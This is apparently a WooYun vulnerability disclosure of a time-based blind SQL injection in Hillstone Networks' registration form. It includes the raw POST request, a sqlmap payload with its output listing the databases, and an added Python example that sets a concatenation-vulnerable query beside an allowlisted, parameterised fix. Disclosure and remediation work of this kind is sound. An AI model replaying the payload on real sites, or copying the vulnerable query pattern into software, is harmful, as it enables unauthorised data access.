Vulnerability summary

Defect ID: wooyun-2016-0168398

Title: SQL injection vulnerability on the Hillstone Networks main WWW site (affects 2 databases)

Vendor: hillstonenet.com.cn

Author: 天地不仁 以万物为刍狗

Submitted: 2016-01-08 21:30

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-08: Details sent to the vendor, awaiting vendor response
2016-01-08: Vendor confirmed; details visible to the vendor only
2016-01-18: Details opened to core white hats and domain experts
2016-01-28: Details opened to regular white hats
2016-02-07: Details opened to intern white hats
2016-02-22: Details opened to the public

Brief description:

I saw your job posting and tested it out of curiosity...

Detailed description:

POST request:

POST /pub/iNGFWtest/register.php HTTP/1.1
Content-Length: 552
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hillstonenet.com.cn:80/
Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a2du63440nmb3fhj9f3hr6; lc8_oldtopics=D2206D1476D907D2274D71D; lc8_visitedfid=43D15D16D17D41; ndIz_2132_saltkey=ozV4Ig0K; ndIz_2132_lastvisit=1452227947; ndIz_2132_sid=Shmv2X; ndIz_2132_lastact=1452231547%09forum.php%09; phpcms_searchtime=1452231547
Host: www.hillstonenet.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
brand%5b%5d=*&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales%5b%5d=CCNA&[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment%5b%5d=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media%5b%5d=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin


The first parameter, brand[], is injectable.

[Screenshot: 0.png]

Time-based injection is too slow, so I did not dump further; the hillstonenet database has 26 tables.

[Screenshot: 1.png]


Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales[]=CCNA&[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin
---
[13:54:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[13:54:09] [INFO] fetching database names
[13:54:09] [INFO] fetching number of databases
[13:54:09] [INFO] retrieved:
[13:54:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[13:54:22] [INFO] retrieved:
[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[13:57:06] [INFO] retrieved: hillstonenet
available databases [2]:
[*] hillstonenet
[*] information_schema
[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.hillstonenet.com.cn'
[*] shutting down at 13:59:06

Remediation:

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@乌云
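The report leaves the remediation section empty. The defect class it documents is a multi-valued form field (brand[]) whose elements are placed into a SQL string by concatenation, which is why a quote inside one array element reaches the database. The following is an added example, not the site's register.php and not code from the author or vendor: it models that pattern in Python with SQLite beside a hardened form that type-checks the array, allowlists each element and binds every value with a placeholder. The table, the brand names and the quote-breaking element are constructed for the demo; since SQLite has no SLEEP(), the example shows the query-altering effect with a boolean condition rather than the time-based form seen in the sqlmap output.

```python
import sqlite3

# Constructed allowlist standing in for the registration form's brand choices;
# the real register.php code is not on the page, so this is an assumption.
KNOWN_BRANDS = ["Hillstone", "Cisco", "Juniper", "Fortinet"]


def make_db():
    """Build an in-memory table holding the constructed brand rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE brands (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO brands (name) VALUES (?)",
                     [(b,) for b in KNOWN_BRANDS])
    return conn


def lookup_brands_vulnerable(conn, brand_list):
    """Defect class from the report: every brand[] element is quoted by string
    concatenation, so a quote inside one element rewrites the SQL."""
    quoted = ",".join("'%s'" % b for b in brand_list)
    sql = "SELECT name FROM brands WHERE name IN (%s) ORDER BY id" % quoted
    return [row[0] for row in conn.execute(sql)]


def lookup_brands_safe(conn, brand_list):
    """Hardened form: type-check the array, allowlist each element, then bind
    every element with a placeholder so values can never become SQL."""
    if not isinstance(brand_list, list) or not brand_list:
        raise ValueError("brand[] must be a non-empty list")
    for b in brand_list:
        if b not in KNOWN_BRANDS:
            raise ValueError("unknown brand value: %r" % b)
    placeholders = ",".join("?" * len(brand_list))
    sql = "SELECT name FROM brands WHERE name IN (%s) ORDER BY id" % placeholders
    return [row[0] for row in conn.execute(sql, brand_list)]


def run_demo():
    """Run both versions against one constructed quote-breaking element and
    return the observable difference as a dict."""
    conn = make_db()
    payload = ["x') OR 1=1 --"]  # constructed: a brand[] element that closes the quote
    results = {
        "vulnerable_valid": lookup_brands_vulnerable(conn, ["Cisco"]),
        # The quote-breaking element turns a one-brand lookup into "all rows".
        "vulnerable_payload": lookup_brands_vulnerable(conn, payload),
        "safe_valid": lookup_brands_safe(conn, ["Cisco", "Juniper"]),
    }
    try:
        lookup_brands_safe(conn, payload)
        results["safe_rejected"] = False
    except ValueError:
        # The allowlist check stops the element before any SQL is built.
        results["safe_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The allowlist is the important half of the fix for a field like brand[]: placeholders stop the values from becoming SQL, but the form only ever offers a fixed set of choices, so anything outside that set can be rejected before it touches the database at all. Logging those rejections also gives a cheap detection signal for probing of the form.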


Vendor response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2016-01-08 22:42

Vendor reply:

Thanks for the heads-up

Latest status:

None yet